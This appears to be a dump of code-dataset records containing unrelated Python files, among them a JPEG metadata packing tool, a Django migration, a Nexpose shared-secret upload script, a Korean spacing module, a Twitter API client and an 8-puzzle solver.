file.\",\n action='store_true', default=False)\n\n parser.add_argument(\"metadata_file\", help=\"Name of file with metadata of file \\\n to be decoded or packed to image file\")\n\n parser.add_argument(\"output_file\", help=\"Name of output file.\")\n\n parser.add_argument(\"image_file\", help=\"Name of file with orig. 
stereoscopic \\\n image\", nargs='?', default=None)\n\n arguments = parser.parse_args()\n\n # Checking file existence and permissions\n # ------------------------------------------------------------------------------\n # existence and permissions of input files\n if not check_file(arguments.metadata_file, os.R_OK):\n print('File', arguments.metadata_file, 'is not accesible.', file=sys.stderr)\n exit(1)\n \n if (arguments.image_file is not None and not\n check_file(arguments.image_file, os.R_OK)):\n print('File', arguments.image_file, 'is not accesible.', file=sys.stderr)\n exit(2)\n \n # need to specify all input files when creating new image\n if not arguments.extract and arguments.image_file is None:\n print('Input file needs to be specified when encoding data to it.',\n file=sys.stderr)\n exit(3)\n\n # checking existence of output file, overwriting or exiting based on '-o'\n if os.path.exists(arguments.output_file):\n print('File \\'{}\\' already exists.'.format(arguments.output_file), \n file=sys.stderr)\n if not os.access(arguments.output_file, os.W_OK):\n print('Do not have write permissions', file=sys.stderr)\n exit(4)\n if not arguments.overwrite:\n print('Use -o to overwrite output files or select different name.')\n exit(5)\n print('Overwriting based on -o.', file=sys.stderr)\n \n # operating with images\n if arguments.extract:\n extract_data(arguments.metadata_file, arguments.output_file)\n else:\n pack_data(arguments.image_file, arguments.metadata_file,\n arguments.output_file)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_semestral_work.py","file_name":"python_semestral_work.py","file_ext":"py","file_size_in_byte":10877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
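Worth making the segment math in the record above concrete: a JPEG APPn segment's 2-byte big-endian length field counts itself plus, here, the 4-byte 'moje' tag and its null terminator, which is where the 65535 - 7 = 65528 B payload ceiling comes from. A minimal sketch of walking APPn segments, assuming a well-formed file (the helper name is hypothetical, not part of the record above):

```python
import struct

def read_app_segments(jpeg_bytes):
    """Yield (marker_hex, payload) for each APPn segment following the SOI marker."""
    pos = 2  # skip the ffd8 start-of-image marker
    while pos + 4 <= len(jpeg_bytes) and jpeg_bytes[pos] == 0xFF:
        if not 0xE0 <= jpeg_bytes[pos + 1] <= 0xEF:
            break  # first non-APPn marker ends the metadata section
        # the big-endian length counts itself (2 B) but not the 2-byte marker
        seg_len = struct.unpack('>H', jpeg_bytes[pos + 2:pos + 4])[0]
        yield jpeg_bytes[pos:pos + 2].hex(), jpeg_bytes[pos + 4:pos + 2 + seg_len]
        pos += 2 + seg_len
```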
+{"seq_id":"305139584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Directory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dir_name', models.CharField(max_length=50)),\n ('parent_dir', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='Log',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('term_id', models.CharField(max_length=50)),\n ('param_id', models.CharField(max_length=50)),\n ('value_id', models.CharField(max_length=50)),\n ('added', models.DateTimeField(auto_now_add=True)),\n ('user_id', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['added'],\n },\n ),\n migrations.CreateModel(\n name='Parameters',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('param_name', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Terminals',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('term_name', models.CharField(max_length=50)),\n ('dir_id', models.ForeignKey(to='commander.Directory')),\n ],\n ),\n migrations.CreateModel(\n name='TermParam',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('param_id', models.ForeignKey(to='commander.Parameters')),\n ('term_id', models.ForeignKey(to='commander.Terminals')),\n ],\n ),\n migrations.CreateModel(\n name='Values',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=50)),\n ('term_param_id', models.ForeignKey(to='commander.TermParam')),\n ],\n ),\n ]\n","sub_path":"commander/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"544774328","text":"import requests\nimport os\nimport json\nimport logging\nimport tempfile\nimport argparse\nimport paramiko\nimport tempfile\nimport shutil\nfrom requests.auth import HTTPBasicAuth\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nlogging.basicConfig(level=logging.INFO)\n\nBASE_URL = os.environ.get(\n 'BASE_URL', \n '')\n\nSECRET_TTL_PATH = os.environ.get(\n 'SECRET_TTL_PATH', \n 'scan_engines/shared_secret/time_to_live')\n\nSECRET_CREATION_PATH = os.environ.get(\n 'SECRET_CREATION_PATH',\n 'scan_engines/shared_secret')\n\nNEXPOSE_HOST = os.environ.get(\n 'NEXPOSE_HOST',\n '')\n\nNEXPOSE_PORT = os.environ.get(\n 'NEXPOSE_PORT',\n '40815')\n\nAZURE_LOCATION = os.environ.get(\n 'AZURE_LOCATION',\n '/opt/rapid7/nexpose/nse/conf')\n\nSECRET_TTL_URL = BASE_URL + SECRET_TTL_PATH\n\nSECRET_CREATION_URL = BASE_URL + SECRET_CREATION_PATH\n\nnxusername = ''\n\nnxpassword = ''\n\nscan_engine_private_key = ''\n\noutput_type = ''\n\nupload = False\n\nscan_engine_user = ''\n\nscan_engine_server = ''\n\ndef main():\n init_cli_args()\n\n shared_secret = create_shared_secret()\n\n ttl = get_ttl_of_secret() # ttl is in minutes\n\n if ttl < 15:\n revoke_shared_secret()\n shared_secret = create_shared_secret()\n\n if upload:\n upload_data(shared_secret)\n\n if output_type == 'json':\n data = {\n \"status\": 200,\n \"message\": {\"sharedSecret\": shared_secret}\n }\n return json.dumps(data, indent=4)\n elif output_type == 'xml':\n data = format_in_xml(shared_secret)\n return data\n elif output_type == 'string':\n return shared_secret\n else:\n return {'status': 500, 'message': 'system error'}\n\n\ndef init_cli_args():\n global nxusername\n global nxpassword\n global output_type\n global scan_engine_private_key\n global upload\n global scan_engine_user\n global scan_engine_server\n\n parser = argparse.ArgumentParser()\n\n required = parser.add_argument_group('required arguments')\n optional = parser.add_argument_group('optional arguments')\n\n optional.add_argument(\n \"-k\", \n \"--private_key\", \n help=\"ssh private key path for auth to nexpose scan engine\")\n\n required.add_argument(\n \"-u\", \n \"--nxusername\", \n help=\"username for your nxadmin account\", \n required=True)\n\n required.add_argument(\n \"-p\", \n \"--nxpassword\", \n help=\"password for your nxadmin account\", \n required=True)\n\n optional.add_argument(\n \"-o\", \n \"--output\", \n help=\"output types [xml, json, string]\",\n choices=['xml', 'json', 'string'],\n default='json')\n\n optional.add_argument(\n \"-l\", \n \"--upload\", \n help=\"upload xml to azure scan engine\",\n action='store_true')\n\n optional.add_argument(\n \"-e\", \n \"--engine_user\", \n help=\"username for nexpose scan engine server\")\n\n optional.add_argument(\n \"-s\", \n \"--engine_server\", \n help=\"nexpose scan engine server hostname or ip\")\n\n cli_args = parser.parse_args()\n\n nxusername = cli_args.nxusername\n nxpassword = cli_args.nxpassword\n scan_engine_private_key = cli_args.private_key\n output_type = cli_args.output\n upload = cli_args.upload\n scan_engine_user = cli_args.engine_user\n scan_engine_server = cli_args.engine_server\n\n\ndef create_shared_secret():\n response = requests.post(\n url=SECRET_CREATION_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif 
response.status_code != 201:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n shared_secret = response.content.decode(\"utf-8\") \n\n return shared_secret\n\n\ndef get_ttl_of_secret():\n response = requests.get(\n url=SECRET_TTL_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif response.status_code != 200:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n ttl = int(response.content)\n\n return ttl // 60\n\n\ndef revoke_shared_secret():\n response = requests.delete(\n url=SECRET_CREATION_URL, \n auth=HTTPBasicAuth(nxusername, nxpassword))\n\n if response.status_code == 415:\n raise SystemExit(json.dumps(\n {'status': response.status_code, \"message\": \"unknown error\"}, indent=4))\n elif response.status_code != 200:\n raise SystemExit(json.dumps(response.json(), indent=4))\n\n return True\n\ndef format_in_xml(shared_secret):\n xml = \"\"\"\n \n \n \n \n \"\"\".format(NEXPOSE_HOST, NEXPOSE_PORT, shared_secret)\n\n return xml\n\n\ndef upload_data(shared_secret):\n xml = format_in_xml(shared_secret)\n\n try:\n fd,tmpfile = tempfile.mkstemp()\n file_ = os.fdopen(fd, \"w+b\")\n file_.write(xml.encode('utf-8'))\n file_.seek(0)\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n k = paramiko.RSAKey.from_private_key_file(scan_engine_private_key)\n ssh.connect(scan_engine_server, username=scan_engine_user, pkey = k)\n sftp = ssh.open_sftp()\n sftp.chdir(AZURE_LOCATION)\n sftp.putfo(file_, 'consoles.xml')\n except Exception as e:\n if os.path.exists(tmpfile):\n os.unlink(tmpfile)\n \n data = {\n \"status\": 500,\n \"message\": \"unable to upload data to {}. {}\".format(\n scan_engine_server, str(e))\n }\n \n raise SystemExit(json.dumps(data, indent=4))\n finally:\n if os.path.exists(tmpfile):\n os.unlink(tmpfile)\n\n data = {\n \"status\": 200,\n \"message\": \"Data uploaded to {}\".format(scan_engine_server)\n }\n raise SystemExit(json.dumps(data, indent=4))\n\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"nx_tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"122242932","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nimport pickle\r\n\r\nINF = 9999\r\nMAX_SENTENCE_LENGTH = 300\r\n\r\n\r\nclass SpacingModule:\r\n\r\n def __init__(self, _path):\r\n self._string = \"\"\r\n self._path = _path\r\n self._max_length = MAX_SENTENCE_LENGTH\r\n self._table = []\r\n self._score = []\r\n self._bt = []\r\n self._segment = []\r\n self._buf_list = []\r\n self._schar_list = []\r\n self._kstring = []\r\n self._eojeol_dictionary = {}\r\n self._morpheme_dictionary = {}\r\n self._postpositional_particle_dictionary = {}\r\n self.__create_table()\r\n self.__open_dictionary()\r\n\r\n def spacing(self, _string):\r\n self.__init_table(_string)\r\n self.__special_char_processing()\r\n self.__prepare()\r\n self.__forward()\r\n self.__backward()\r\n self.__apply_heuristics()\r\n self.__merge_string()\r\n self.__quotation_mark_processing()\r\n self.__syllable_processing()\r\n self.__etc_heuristics()\r\n return self._string\r\n\r\n def __create_table(self):\r\n self._table = [[0] * self._max_length for col in range(self._max_length)]\r\n self._score = [0] * self._max_length\r\n self._bt = [0] * self._max_length\r\n\r\n def __open_dictionary(self):\r\n eojeol_dict_file = open(self._path + \"/dict/eojeol/eojeol_dict.dict\", 'rb')\r\n morpheme_dict_file = open(self._path + \"/dict/morpheme/morpheme_dict.dict\", 'rb')\r\n postpositional_particle_dict_file = open(self._path +\r\n \"/dict/postpositional particle/postpositional_particle_dict.dict\", 'rb')\r\n\r\n self._eojeol_dictionary = pickle.load(eojeol_dict_file, encoding='UTF-8')\r\n self._morpheme_dictionary = pickle.load(morpheme_dict_file, encoding='UTF-8')\r\n self._postpositional_particle_dictionary = pickle.load(postpositional_particle_dict_file, encoding='UTF-8')\r\n\r\n def __init_table(self, _string):\r\n self._string = _string.strip()\r\n for j in range(self._max_length):\r\n self._score[j] = 0\r\n self._bt[j] = 0\r\n for k in range(self._max_length):\r\n self._table[j][k] = 0\r\n self._segment.clear()\r\n self._schar_list.clear()\r\n\r\n def __special_char_processing(self):\r\n split_char = '!@#'\r\n schar = re.compile('[^\\u3131-\\u3163\\uac00-\\ud7a3]+')\r\n\r\n buffer = schar.sub(split_char, self._string)\r\n self._kstring = buffer.split(split_char)\r\n self._schar_list = schar.findall(self._string)\r\n\r\n self._string = schar.sub('', self._string)\r\n self._string = ' ' + self._string\r\n self._length = len(self._string)\r\n\r\n def __eojeol_score(self, _string):\r\n if _string in self._eojeol_dictionary:\r\n return self._eojeol_dictionary.get(_string)\r\n\r\n def __prepare(self):\r\n # table is empty == 0\r\n # table is exists != 0\r\n # table is virtual eojeols == -10.0\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if k - j >= 10:\r\n break\r\n slicing_string = self._string[j:k + 1]\r\n if slicing_string in self._eojeol_dictionary:\r\n self._table[j][k] = self.__eojeol_score(slicing_string)\r\n else:\r\n self._table[j][k] = 0\r\n\r\n # adding virtual eojeols\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if self._table[j][k] is not 0 and self._table[j][k] is not -10.0:\r\n i = j - 1\r\n cnt = 0\r\n while i > 0 and cnt < 6:\r\n if self._table[i][j - 1] is 0:\r\n self._table[i][j - 1] = -10.0\r\n i = i - 1\r\n cnt = cnt + 1\r\n\r\n def __forward(self):\r\n self._score[0] = 0\r\n for i in range(1, self._length):\r\n self._score[i] = -INF\r\n for j in range(1, self._length):\r\n for k in range(j, self._length):\r\n if 
self._table[j][k] is not 0:\r\n if (self._score[j - 1] + self._table[j][k]) > self._score[k]:\r\n self._score[k] = self._score[j - 1] + self._table[j][k]\r\n self._bt[k] = j\r\n self._bt[self._length - 1] = self._bt[self._length - 2]\r\n\r\n def __backward(self):\r\n k = self._length - 1\r\n while k > 0:\r\n j = self._bt[k]\r\n slicing_string = self._string[j:k + 1]\r\n self._segment.append(slicing_string)\r\n k = j - 1\r\n self._segment.reverse()\r\n\r\n def __add(self, _idx):\r\n _string = str(self._segment[_idx - 1]) + str(self._segment[_idx])\r\n self._segment.pop(_idx - 1)\r\n self._segment.pop(_idx - 1)\r\n self._segment.insert(_idx - 1, str(_string))\r\n\r\n def __apply_heuristics(self):\r\n sticklst = list()\r\n del sticklst[:]\r\n\r\n for idx in range(1, self._segment.__len__()):\r\n if self.__heuristics_1(idx) is True:\r\n if self.__heuristics_1_1(idx) is True or \\\r\n self.__heuristics_1_2(idx) is True or \\\r\n self.__heuristics_1_3(idx) is True:\r\n sticklst.append(idx)\r\n\r\n dist = 0\r\n for i in range(sticklst.__len__()):\r\n self.__add(sticklst[i] - dist)\r\n dist = dist + 1\r\n\r\n def __heuristics_1(self, _idx):\r\n morpheme = self._segment[_idx - 1]\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"NNG\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"NNP\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"NNB\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_1(self, _idx):\r\n morpheme = self._segment[_idx]\r\n if morpheme in self._postpositional_particle_dictionary:\r\n return True\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"VX\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_2(self, _idx):\r\n this_eojeol = self._segment[_idx]\r\n length = this_eojeol.__len__()\r\n for k in range(length):\r\n morpheme = this_eojeol[0:k + 1]\r\n if morpheme in self._morpheme_dictionary and \\\r\n (morpheme is \"하\" or morpheme is \"되\" or morpheme is \"시키\"):\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"VV\":\r\n return True\r\n return False\r\n\r\n def __heuristics_1_3(self, _idx):\r\n this_eojeol = self._segment[_idx]\r\n if this_eojeol[0] is \"들\":\r\n return True\r\n return False\r\n\r\n def __heuristics_2(self, _idx):\r\n morpheme = self._segment[_idx]\r\n if morpheme in self._morpheme_dictionary:\r\n for i in range(self._morpheme_dictionary[morpheme].__len__()):\r\n if self._morpheme_dictionary[morpheme][i] == \"JKS\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKC\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKG\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKO\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKB\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKV\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JKQ\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JX\" or \\\r\n self._morpheme_dictionary[morpheme][i] == \"JC\":\r\n return True\r\n return False\r\n\r\n def __merge_string(self):\r\n result = ''\r\n seg_length = self._segment.__len__()\r\n for i in range(seg_length):\r\n result += self._segment[i]\r\n result += ' '\r\n result = result[:-1]\r\n idx = 0\r\n for i in range(len(self._kstring) - 1):\r\n for j in range(len(self._kstring[i])):\r\n if result[idx] == ' 
':\r\n idx += 1\r\n if self._kstring[i][j] == result[idx]:\r\n idx += 1\r\n result = result[:idx] + self._schar_list[i] + result[idx:]\r\n idx += len(self._schar_list[i])\r\n\r\n string = result\r\n length = len(result)\r\n result = result[0]\r\n kor = re.compile('[가-힝]')\r\n num = re.compile('[0-9]')\r\n eng = re.compile('[a-zA-Z]')\r\n\r\n for i in range(1, length - 1):\r\n fk = kor.match(string[i - 1])\r\n tk = kor.match(string[i + 1])\r\n n = num.match(string[i])\r\n fn = num.match(string[i - 1])\r\n fe = eng.match(string[i - 1])\r\n if fk and n:\r\n result += ' '\r\n if fe and tk and string[i] == ' ':\r\n continue\r\n if fn and tk and string[i] == ' ':\r\n continue\r\n result += string[i]\r\n result += string[length - 1]\r\n self._string = result\r\n\r\n def __quotation_mark_processing(self):\r\n # 큰따옴표, 작은따옴표, 쉼표\r\n result = self._string\r\n length = result.__len__()\r\n ret = \"\"\r\n flag1 = 0\r\n flag2 = 0\r\n for i in range(length):\r\n if result[i] is '\"':\r\n flag1 = flag1 + 1\r\n if flag1 % 2 is 1:\r\n if i - 1 >= 0 and result[i - 1] is not ' ':\r\n ret = ret + ' \"'\r\n continue\r\n ret = ret + '\"'\r\n continue\r\n elif flag1 % 2 is 0:\r\n if i - 1 >= 0 and result[i - 1] is ' ':\r\n ret = ret[0:ret.__len__() - 1]\r\n ret = ret + '\"'\r\n continue\r\n elif result[i] is \"'\":\r\n flag2 = flag2 + 1\r\n if flag2 % 2 is 1:\r\n if i - 1 >= 0 and result[i - 1] is not ' ':\r\n ret = ret + \" '\"\r\n continue\r\n ret = ret + \"'\"\r\n continue\r\n elif flag2 % 2 is 0:\r\n if i - 1 >= 0 and result[i - 1] is ' ':\r\n ret = ret[0:ret.__len__() - 1]\r\n ret = ret + \"'\"\r\n continue\r\n if i - 1 >= 0 and result[i - 1] is '\"' and result[i] is ' ':\r\n continue\r\n if i - 1 >= 0 and result[i - 1] is \"'\" and result[i] is ' ':\r\n continue\r\n ret = ret + result[i]\r\n self._string = ret\r\n\r\n def __syllable_processing(self):\r\n self._segment = self._string.split(' ')\r\n self.__backward_processing()\r\n self.__forward_processing()\r\n buffer = \"\"\r\n for i in range(self._segment.__len__()):\r\n buffer += self._segment[i]\r\n buffer += ' '\r\n self._string = buffer[:-1]\r\n\r\n def __forward_processing(self):\r\n length = self._segment.__len__() - 1\r\n self._buf_list = []\r\n flag = 0\r\n for i in range(length, 0, -1):\r\n if flag == 1:\r\n flag = 0\r\n continue\r\n if len(self._segment[i]) == 1:\r\n buffer = self._segment[i - 1] + self._segment[i]\r\n if buffer in self._eojeol_dictionary:\r\n self._buf_list.append(buffer)\r\n flag += 1\r\n continue\r\n self._buf_list.append(str(self._segment[i]))\r\n if flag == 0:\r\n self._buf_list.append(self._segment[0])\r\n self._segment = list(reversed(self._buf_list))\r\n\r\n def __backward_processing(self):\r\n length = self._segment.__len__()\r\n self._buf_list = []\r\n flag = 0\r\n for i in range(length):\r\n if flag == 1:\r\n flag = 0\r\n continue\r\n if len(self._segment[i]) == 1:\r\n if i == length - 1:\r\n self._buf_list.append(self._segment[i])\r\n break\r\n buffer = self._segment[i] + self._segment[i+1]\r\n if buffer in self._eojeol_dictionary:\r\n self._buf_list.append(buffer)\r\n flag += 1\r\n continue\r\n self._buf_list.append(self._segment[i])\r\n self._segment = self._buf_list\r\n\r\n def __etc_heuristics(self):\r\n result = self._string\r\n result = re.sub(',', ', ', result)\r\n result = re.sub('% ', '%', result)\r\n result = re.sub(' 를', '를', result)\r\n result = re.sub(' 을', '을', result)\r\n result = re.sub(' 만 ', '만 ', result)\r\n result = re.sub(' 만,', '만,', result)\r\n result = re.sub('지않', '지 않', result)\r\n result = 
re.sub('것같', '것 같', result)\r\n result = re.sub(' {1}\\(', '(', result)\r\n result = re.sub('\\( {1}', '(', result)\r\n result = re.sub(' {1}\\)', ')', result)\r\n result = re.sub('\\) {1}', ')', result)\r\n result = re.sub('· {1}', '·', result)\r\n result = re.sub(' {2}', ' ', result)\r\n result = re.sub('열 었다', '열었다', result)\r\n result = re.sub('말 한다', '말한다', result)\r\n result = re.sub('들 었다', '들었다', result)\r\n result = re.sub('했 었다', '했었다', result)\r\n result = re.sub('그 쳤다', '그쳤다', result)\r\n result = re.sub('습 니다', '습니다', result)\r\n result = re.sub('중요 하다', '중요하다', result)\r\n result = re.sub('열 심이다', '열심이다', result)\r\n result = re.sub('운영 한다', '운영한다', result)\r\n result = re.sub('알 맞다', '알맞다', result)\r\n result = re.sub('고말한다', '고 말한다', result)\r\n result = re.sub('낮 았다', '낮았다', result)\r\n result = re.sub('안내 한다', '안내한다', result)\r\n result = re.sub('만 나서', ' 만나서 ', result)\r\n result = re.sub('시작 하도록', '시작하도록', result)\r\n result = re.sub('많 았다', '많았다', result)\r\n result = re.sub('가능 하다', '가능하다', result)\r\n result = re.sub('있 겠 습니다', ' 있겠습니다', result)\r\n result = re.sub('나섰다', ' 나섰다', result)\r\n result = re.sub('전해졌다', ' 전해졌다', result)\r\n result = re.sub('밝혔다', ' 밝혔다', result)\r\n result = re.sub('감소 했다', '감소했다', result)\r\n result = re.sub('받 았다', '받았다', result)\r\n self._string = result\r\n","sub_path":"BUFS_KoSpacing.py","file_name":"BUFS_KoSpacing.py","file_ext":"py","file_size_in_byte":15099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"435099907","text":"def solution():\n result = 0\n X, Y = map(int, input().split())\n T = int(input())\n locations = [tuple(map(int, input().split())) for i in range(T+1)]\n for i in range(T):\n dong = locations[T][1]\n store = locations[i][1]\n if locations[T][0] == locations[i][0]:\n result += abs(dong - store)\n elif (locations[T][0] == 1 or locations[T][0] == 2):\n if (locations[i][0] == 1 or locations[i][0] == 2):\n result += abs(dong - store) + min(X - dong, dong, X - store, store) * 2 + Y\n elif locations[i][0] == 3:\n if locations[T][0] == 1:\n result += dong + store\n else:\n result += dong + Y - store\n elif locations[i][0] == 4:\n if locations[T][0] == 1:\n result += X - dong + store\n else:\n result += X - dong + Y - store\n elif (locations[T][0] == 3 or locations[T][0] == 4):\n if (locations[i][0] == 3 or locations[i][0] == 4):\n result += abs(dong - store) + min(Y - dong, dong, Y - store, store) * 2 + X\n elif locations[i][0] == 1:\n if locations[T][0] == 3:\n result += dong + store\n else:\n result += dong + X - store\n elif locations[i][0] == 4:\n if locations[T][0] == 1:\n result += Y - dong + store\n else:\n result += Y - dong + X - store\n print(result)\nsolution()","sub_path":"200920/bj_2564.py","file_name":"bj_2564.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"236381108","text":"import logging\nimport random\nimport requests\nfrom typing import List, Union\n\n\ndef _get_headers(bearer_token: str):\n return {'Authorization': 'Bearer {}'.format(bearer_token)}\n\n\nclass TwitterWatcher:\n\n def __init__(self, bearer_token_list: List[str]):\n assert bearer_token_list\n self.bearer_token_list = bearer_token_list\n self.current_token_index = random.randrange(len(bearer_token_list))\n self.logger = logging.getLogger('twitter')\n\n def query(self, url: str, params: dict) -> Union[dict, list, None]:\n for _ in range(len(self.bearer_token_list)):\n self.current_token_index = (self.current_token_index + 1) % len(self.bearer_token_list)\n headers = _get_headers(self.bearer_token_list[self.current_token_index])\n try:\n response = requests.request('GET', url, headers=headers, params=params, timeout=300)\n except requests.exceptions.ConnectionError as e:\n self.logger.error('Request error: {}, try next token.'.format(e))\n continue\n if response.status_code == 200:\n return response.json()\n if response.status_code != 429:\n self.logger.error('Request returned an error: {} {}, try next token.'.format(\n response.status_code, response.text))\n self.logger.error('All tokens are unavailable, query fails. {}'.format(url))\n return None\n\n def get_user_by_username(self, username: str, params: dict) -> dict:\n url = 'https://api.twitter.com/2/users/by/username/{}'.format(username)\n user = None\n while user is None:\n user = self.query(url, params)\n return user\n\n def get_user_by_id(self, id: str, params: dict) -> dict:\n url = 'https://api.twitter.com/2/users/{}'.format(id)\n user = None\n while user is None:\n user = self.query(url, params)\n return user\n\n def get_id_by_username(self, username: str):\n user = self.get_user_by_username(username, {})\n if user.get('errors', None):\n logging.error(\n 'Initialization error, please check if username {} exists'.format(username))\n raise ValueError('\\n'.join([error['detail'] for error in user['errors']]))\n return user['data']['id']\n\n def check_token(self):\n result = dict()\n for bearer_token in self.bearer_token_list:\n headers = _get_headers(bearer_token)\n url = 'https://api.twitter.com/2/users/by/username/Twitter'\n try:\n response = requests.request('GET', url, headers=headers)\n except requests.exceptions.ConnectionError as e:\n result[bearer_token] = False\n print(e)\n continue\n result[bearer_token] = (response.status_code == 200)\n print(response.json())\n return result\n","sub_path":"twitter_watcher.py","file_name":"twitter_watcher.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"463413998","text":"import cv2, time\nFPS = 0\ncap = cv2.VideoCapture(0)\n\nlast = time.time()\n\nfor i in range(0,100):\n before = time.time()\n rval, frame = cap.read()\n now = time.time()\n print(\"cap.read() took: \" + str(now - before))\n if(now - last >= 1):\n print(FPS)\n last = now\n FPS = 0\n else:\n FPS += 1\ncap.release()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"110712654","text":"#!/usr/bin/env python3\nimport random\nimport math\n\n\ndef swap (list, position_a, position_b):\n list[position_a], list[position_b] = list[position_b], list[position_a]\nclass Graph:\n def __init__(self, root, size):\n self.root = root\n self.visited = [root]\n self.queue = []\n self.leaves = [root]\n self.size =size\n\n def bfs(self, goal):\n self.queue.append(self.root)\n while self.queue:\n s = self.queue.pop(0)\n if s.data == goal:\n return s\n if s not in self.visited:\n self.visited.append(s)\n for move in s.moves:\n self.queue.append(move)\n self.queue = []\n return None\n\n def new_level(self):\n count = len(self.leaves)\n for i in range(0, count):\n node = self.leaves.pop(0)\n node.new_moves(self.size)\n for n in node.moves:\n if n not in self.visited:\n self.leaves.append(n)\n\n def print_path(self, node):\n path = [node]\n moves = []\n while node.parent is not None:\n path.append(node.parent)\n node = node.parent\n path.reverse()\n for node in path:\n print(\"{}\\n{}\\n{}\\n\".format(node.data[0:3],node.data[3:6],node.data[6:]))\n\nclass Node:\n def __init__(self, data, position, previous, parent):\n self.moves = []\n self.data = data\n self.position = position\n self.previous = previous\n self.parent = parent\n\n def new_moves(self, size):\n if self.position % size != 0 and self.previous != 'r':\n left_move = self.data.copy()\n swap(left_move, self.position, self.position - 1)\n self.moves.append(Node(left_move, self.position - 1, 'l', self))\n if self.position % size != size-1 and self.previous != 'l':\n right_move = self.data.copy()\n swap(right_move, self.position, self.position + 1)\n self.moves.append(Node(right_move, self.position + 1, 'r', self))\n if self.position > size-1 and self.previous != 'd':\n up_move = self.data.copy()\n swap(up_move, self.position, self.position - size)\n self.moves.append(Node(up_move, self.position - size, 'u', self))\n if self.position < (len(self.data)-size) and self.previous != 'u':\n down_move = self.data.copy()\n swap(down_move, self.position, self.position + size)\n self.moves.append(Node(down_move, self.position + size, 'd', self))\n\n def __str__(self):\n return self.data\n\n\ndef solve(size, input, goal):\n puzzle = input\n print(\"Puzzle:\\n{}\\n{}\\n{}\\n\".format(puzzle[0:3],puzzle[3:6],puzzle[6:]))\n print(\"Goal:\\n{}\\n{}\\n{}\\n\". 
